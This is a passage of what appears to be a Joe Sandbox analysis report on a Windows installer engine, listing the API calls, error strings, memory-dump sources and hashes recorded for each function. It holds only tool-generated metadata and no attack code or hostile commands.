                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0091F2F8
                                                                                                                                                                    Strings
                                                                                                                                                                    • EngineForApplication.cpp, xrefs: 0091F31C
                                                                                                                                                                    • Failed to post plan message., xrefs: 0091F326
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorLastMessagePostThread
                                                                                                                                                                    • String ID: EngineForApplication.cpp$Failed to post plan message.
                                                                                                                                                                    • API String ID: 2609174426-2952114608
                                                                                                                                                                    • Opcode ID: 49579dbfc828159bdad07bdd288d9c489f8774d309c487a4231fdb11a188b1c2
                                                                                                                                                                    • Instruction ID: 34b2dd738c65be038f0e982b370a753740b81ea42efad3ec3be021bfc0be58b6
                                                                                                                                                                    • Opcode Fuzzy Hash: 49579dbfc828159bdad07bdd288d9c489f8774d309c487a4231fdb11a188b1c2
                                                                                                                                                                    • Instruction Fuzzy Hash: 70F0A7377552396BD6206AA65C09E8B7F88EF45BB1B018121BE54AB191E660DC0192D4
                                                                                                                                                                    APIs
                                                                                                                                                                    • PostThreadMessageW.USER32(?,00009005,?,00000000), ref: 0091F3FC
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0091F406
                                                                                                                                                                    Strings
                                                                                                                                                                    • EngineForApplication.cpp, xrefs: 0091F42A
                                                                                                                                                                    • Failed to post shutdown message., xrefs: 0091F434
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorLastMessagePostThread
                                                                                                                                                                    • String ID: EngineForApplication.cpp$Failed to post shutdown message.
                                                                                                                                                                    • API String ID: 2609174426-188808143
                                                                                                                                                                    • Opcode ID: 2ab9ca1ec6a95e71d0a6ca8361bbd3ca827cf75010b65b7fa69c44782103e437
                                                                                                                                                                    • Instruction ID: 10318792afbc9b88f70b0b253b911eedd0503262bb6fcc7ac8fec41489c7428d
                                                                                                                                                                    • Opcode Fuzzy Hash: 2ab9ca1ec6a95e71d0a6ca8361bbd3ca827cf75010b65b7fa69c44782103e437
                                                                                                                                                                    • Instruction Fuzzy Hash: B2F0A73775523967D7315A966C0DF877B98AF44B61B014021BE14BB1E1E660DC0087D5
                                                                                                                                                                    APIs
                                                                                                                                                                    • SetEvent.KERNEL32(0094B478,00000000,?,00921717,?,00000000,?,0090C287,?,00905405,?,009175A5,?,?,00905405,?), ref: 009207BF
                                                                                                                                                                    • GetLastError.KERNEL32(?,00921717,?,00000000,?,0090C287,?,00905405,?,009175A5,?,?,00905405,?,00905445,00000001), ref: 009207C9
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed to set begin operation event., xrefs: 009207F7
                                                                                                                                                                    • cabextract.cpp, xrefs: 009207ED
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorEventLast
                                                                                                                                                                    • String ID: Failed to set begin operation event.$cabextract.cpp
                                                                                                                                                                    • API String ID: 3848097054-4159625223
                                                                                                                                                                    APIs
                                                                                                                                                                    • PostThreadMessageW.USER32(?,00009003,00000000,?), ref: 0091EBE0
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0091EBEA
                                                                                                                                                                    Strings
                                                                                                                                                                    • EngineForApplication.cpp, xrefs: 0091EC0E
                                                                                                                                                                    • Failed to post apply message., xrefs: 0091EC18
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorLastMessagePostThread
                                                                                                                                                                    • String ID: EngineForApplication.cpp$Failed to post apply message.
                                                                                                                                                                    • API String ID: 2609174426-1304321051
                                                                                                                                                                    APIs
                                                                                                                                                                    • PostThreadMessageW.USER32(?,00009000,00000000,?), ref: 0091EC71
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0091EC7B
                                                                                                                                                                    Strings
                                                                                                                                                                    • EngineForApplication.cpp, xrefs: 0091EC9F
                                                                                                                                                                    • Failed to post detect message., xrefs: 0091ECA9
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorLastMessagePostThread
                                                                                                                                                                    • String ID: EngineForApplication.cpp$Failed to post detect message.
                                                                                                                                                                    • API String ID: 2609174426-598219917
                                                                                                                                                                    APIs
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: __alldvrm$_strrchr
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1036877536-0
                                                                                                                                                                    APIs
                                                                                                                                                                    Strings
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: lstrlen
                                                                                                                                                                    • String ID: dlutil.cpp
                                                                                                                                                                    • API String ID: 1659193697-2067379296
                                                                                                                                                                    APIs
                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000000,ECE85006,00932444,00000000,00000000,00933479,?,00933479,?,00000001,00932444,ECE85006,00000001,00933479,00933479), ref: 00939278
                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00939301
                                                                                                                                                                    • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00939313
                                                                                                                                                                    • __freea.LIBCMT ref: 0093931C
                                                                                                                                                                      • Part of subcall function 0093521A: HeapAlloc.KERNEL32(00000000,?,?,?,00931F87,?,0000015D,?,?,?,?,009333E0,000000FF,00000000,?,?), ref: 0093524C
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ByteCharMultiWide$AllocHeapStringType__freea
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 573072132-0
                                                                                                                                                                    APIs
                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,00000000,?,00905552,?,?,?,?,?,?), ref: 00904FFE
                                                                                                                                                                    • DeleteCriticalSection.KERNEL32(?,?,?,00000000,?,00905552,?,?,?,?,?,?), ref: 00905012
                                                                                                                                                                    • TlsFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00905552,?,?), ref: 00905101
                                                                                                                                                                    • DeleteCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00905552,?,?), ref: 00905108
                                                                                                                                                                      • Part of subcall function 00901161: LocalFree.KERNEL32(?,?,00904FBB,?,00000000,?,00905552,?,?,?,?,?,?), ref: 0090116B
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CriticalDeleteFreeSection$CloseHandleLocal
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3671900028-0
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 0090F96C: RegCloseKey.ADVAPI32(00000000,?,?,00000001,00000000,00000000,?,?,00904CA5,?,?,00000001), ref: 0090F9BC
                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,?,?,00000001,00000000,?,?,?), ref: 00904D0C
                                                                                                                                                                    Strings
                                                                                                                                                                    • Unable to get resume command line from the registry, xrefs: 00904CAB
                                                                                                                                                                    • Failed to get current process path., xrefs: 00904CCA
                                                                                                                                                                    • Failed to re-launch bundle process after RunOnce: %ls, xrefs: 00904CF6
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Close$Handle
                                                                                                                                                                    • String ID: Failed to get current process path.$Failed to re-launch bundle process after RunOnce: %ls$Unable to get resume command line from the registry
                                                                                                                                                                    • API String ID: 187904097-642631345
                                                                                                                                                                    • Opcode ID: 89f16dc9907116d17cafb69af80b043d4ff7180005347f59c95c1b3014604f52
                                                                                                                                                                    • Instruction ID: 76468d5b089edf00d48bc8362e2f0fb560450f52e75806f7bc8c788e7d92f005
                                                                                                                                                                    • Opcode Fuzzy Hash: 89f16dc9907116d17cafb69af80b043d4ff7180005347f59c95c1b3014604f52
                                                                                                                                                                    • Instruction Fuzzy Hash: 19114F71D0151CBFCF22ABA5DC01D9EBBB8AF94711B108196FA10A6291E7319A10DB80
                                                                                                                                                                    APIs
                                                                                                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00938A56,00000000,00000000,?,00938859,00938A56,00000000,00000000,00000000,?,00938A56,00000006,FlsSetValue), ref: 009388E4
                                                                                                                                                                    • GetLastError.KERNEL32(?,00938859,00938A56,00000000,00000000,00000000,?,00938A56,00000006,FlsSetValue,00962404,0096240C,00000000,00000364,?,00936230), ref: 009388F0
                                                                                                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00938859,00938A56,00000000,00000000,00000000,?,00938A56,00000006,FlsSetValue,00962404,0096240C,00000000), ref: 009388FE
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                     • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3177248105-0
                                                                                                                                                                    • Opcode ID: ddb588e45a65cea8c3292f7eb101984bb308878a514719c875f4233048341162
                                                                                                                                                                    • Instruction ID: 3ee7f5b41eb6ce518216f0b5f9f273962d0777913600b8faffcd288bf96d8c08
                                                                                                                                                                    • Opcode Fuzzy Hash: ddb588e45a65cea8c3292f7eb101984bb308878a514719c875f4233048341162
                                                                                                                                                                    • Instruction Fuzzy Hash: B401F736669326ABCB214A79DC44F6B779CEF06BA1F200A24F916E3140DF60DC008BE0
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetLastError.KERNEL32(?,00000000,00931AEC,00000000,80004004,?,00931DF0,00000000,80004004,00000000,00000000), ref: 00936162
                                                                                                                                                                    • SetLastError.KERNEL32(00000000,80004004,00000000,00000000), ref: 009361CA
                                                                                                                                                                    • SetLastError.KERNEL32(00000000,80004004,00000000,00000000), ref: 009361D6
                                                                                                                                                                    • _abort.LIBCMT ref: 009361DC
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                     • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorLast$_abort
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 88804580-0
                                                                                                                                                                    • Opcode ID: 49a657fb469c50b3621fad87d67db14dcaf9a36a69d8e0acc6da9cae135a76ae
                                                                                                                                                                    • Instruction ID: 984fe2d3680124944c6b20ba741c9e5fbf8f0482b7577692a2d601c143a121f6
                                                                                                                                                                    • Opcode Fuzzy Hash: 49a657fb469c50b3621fad87d67db14dcaf9a36a69d8e0acc6da9cae135a76ae
                                                                                                                                                                    • Instruction Fuzzy Hash: 03F0C83920CB01B7C21237B56C0AF2F169E8FC6771F264118F925E6197FF64D8026D61
                                                                                                                                                                    APIs
                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 00907441
                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?,?,?,00000000), ref: 009074A8
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed to get value of variable: %ls, xrefs: 0090747B
                                                                                                                                                                    • Failed to get value as numeric for variable: %ls, xrefs: 00907497
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                     • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CriticalSection$EnterLeave
                                                                                                                                                                    • String ID: Failed to get value as numeric for variable: %ls$Failed to get value of variable: %ls
                                                                                                                                                                    • API String ID: 3168844106-4270472870
                                                                                                                                                                    • Opcode ID: e123cd28f5adeac96d9c2373ca0e102c3d5e7f89797891f424fbeec3c5aa1abd
                                                                                                                                                                    • Instruction ID: dd1925d370d57c1810472961a3ac7efa0d4b79c3399600cfe981dbc557fbf1db
                                                                                                                                                                    • Opcode Fuzzy Hash: e123cd28f5adeac96d9c2373ca0e102c3d5e7f89797891f424fbeec3c5aa1abd
                                                                                                                                                                    • Instruction Fuzzy Hash: 15015E36D49128BFCF115E94CC49E9EBF6AAF44771F018161FD04AA2A1D336AE20A7D1
                                                                                                                                                                    APIs
                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 009075B6
                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?,?,?,00000000), ref: 0090761D
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed to get value as version for variable: %ls, xrefs: 0090760C
                                                                                                                                                                    • Failed to get value of variable: %ls, xrefs: 009075F0
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                     • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CriticalSection$EnterLeave
                                                                                                                                                                    • String ID: Failed to get value as version for variable: %ls$Failed to get value of variable: %ls
                                                                                                                                                                    • API String ID: 3168844106-1851729331
                                                                                                                                                                    • Opcode ID: 5623c9284d7666451c06d9bd8a1d1c965b3059200c5d9b403a9f0b15728c4bf3
                                                                                                                                                                    • Instruction ID: 13d7a72767d3e531fd5b7ed96d7fac3b2d6db37f3d1dc8e9c1e28e2889356503
                                                                                                                                                                    • Opcode Fuzzy Hash: 5623c9284d7666451c06d9bd8a1d1c965b3059200c5d9b403a9f0b15728c4bf3
                                                                                                                                                                    • Instruction Fuzzy Hash: 92019E32D0952CEFCF115E84CC09E9EBA28AF14330F008121FD05AA1A1D336AE10ABD5
                                                                                                                                                                    APIs
                                                                                                                                                                    • EnterCriticalSection.KERNEL32(00000000,00000000,00000006,?,00909897,00000000,?,00000000,00000000,00000000,?,009096D6,00000000,?,00000000,00000000), ref: 00907545
                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(00000000,00000000,00000000,00000000,?,00909897,00000000,?,00000000,00000000,00000000,?,009096D6,00000000,?,00000000), ref: 0090759B
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed to copy value of variable: %ls, xrefs: 0090758A
                                                                                                                                                                    • Failed to get value of variable: %ls, xrefs: 0090756B
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                     • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CriticalSection$EnterLeave
                                                                                                                                                                    • String ID: Failed to copy value of variable: %ls$Failed to get value of variable: %ls
                                                                                                                                                                    • API String ID: 3168844106-2936390398
                                                                                                                                                                    • Opcode ID: 1d9e8c126ba60c276512b353030789a8bea1be83b1455a0ec9b39c2069f498e7
                                                                                                                                                                    • Instruction ID: 7b1549001fa383f7e332888ed9c8c947e4f2c4f22cdf4fa1a8dd852348b3a624
                                                                                                                                                                    • Opcode Fuzzy Hash: 1d9e8c126ba60c276512b353030789a8bea1be83b1455a0ec9b39c2069f498e7
                                                                                                                                                                    • Instruction Fuzzy Hash: 34F0817694512CBFCF115F94CC09EDE7B68EF55361F004110FD04A62A0D336AE20ABD0
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 0092E788
                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 0092E797
                                                                                                                                                                    • GetCurrentProcessId.KERNEL32 ref: 0092E7A0
                                                                                                                                                                    • QueryPerformanceCounter.KERNEL32(?), ref: 0092E7AD
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                     • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2933794660-0
                                                                                                                                                                    • Opcode ID: 924073edc5fa7b616a4aa40cd7807395d43263336f26ff40a0c2df2d427f7977
                                                                                                                                                                    • Instruction ID: 43f82c94e59d9132b788ec2fed281f4e8d3737e20241aa66e0f50170f62490b8
                                                                                                                                                                    • Opcode Fuzzy Hash: 924073edc5fa7b616a4aa40cd7807395d43263336f26ff40a0c2df2d427f7977
                                                                                                                                                                    • Instruction Fuzzy Hash: C1F09D74C2520CEBCB00DFB4D949A9EBBF8EF08301F514895A405E7110E734AB049B61
                                                                                                                                                                    APIs
                                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00940DD7
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Close
                                                                                                                                                                    • String ID: regutil.cpp
                                                                                                                                                                    • API String ID: 3535843008-955085611
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 00940F6C: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,0096AAA0,00000000,?,009457E1,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 00940F80
                                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000,80000002,SYSTEM\CurrentControlSet\Control\Session Manager,00000003,?,00000000,00000000,00000101), ref: 009448FC
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CloseOpen
                                                                                                                                                                    • String ID: PendingFileRenameOperations$SYSTEM\CurrentControlSet\Control\Session Manager
                                                                                                                                                                    • API String ID: 47109696-3023217399
                                                                                                                                                                    APIs
                                                                                                                                                                    • RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000001,00000000,00000000,00000000,00000000,00000000), ref: 0094112B
                                                                                                                                                                    • RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,?), ref: 00941163
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: QueryValue
                                                                                                                                                                    • String ID: regutil.cpp
                                                                                                                                                                    • API String ID: 3660427363-955085611
                                                                                                                                                                    APIs
                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(0094B518,00000000,00000006,00000001,comres.dll,?,00000000,?,00000000,?,?,00000000,00000006,?,comres.dll,?), ref: 009367A3
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 009367BF
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ByteCharErrorLastMultiWide
                                                                                                                                                                    • String ID: comres.dll
                                                                                                                                                                    • API String ID: 203985260-246242247
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 00948E44: lstrlenW.KERNEL32(00000100,?,?,?,00949217,000002C0,00000100,00000100,00000100,?,?,?,00927D87,?,?,000001BC), ref: 00948E69
                                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000,?,?,00000000,?,00000000,?,?,?,00000000,wininet.dll,?,0094B500,wininet.dll,?), ref: 0094907A
                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,00000000,?,00000000,?,?,?,00000000,wininet.dll,?,0094B500,wininet.dll,?), ref: 00949087
                                                                                                                                                                      • Part of subcall function 00940F6C: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,0096AAA0,00000000,?,009457E1,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 00940F80
                                                                                                                                                                      • Part of subcall function 00940E4F: RegEnumKeyExW.ADVAPI32(00000000,000002C0,00000410,00000002,00000000,00000000,00000000,00000000,00000410,00000002,00000100,00000000,00000000,?,?,00928E1B), ref: 00940EAA
                                                                                                                                                                      • Part of subcall function 00940E4F: RegQueryInfoKeyW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00928E1B,00000000), ref: 00940EC8
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
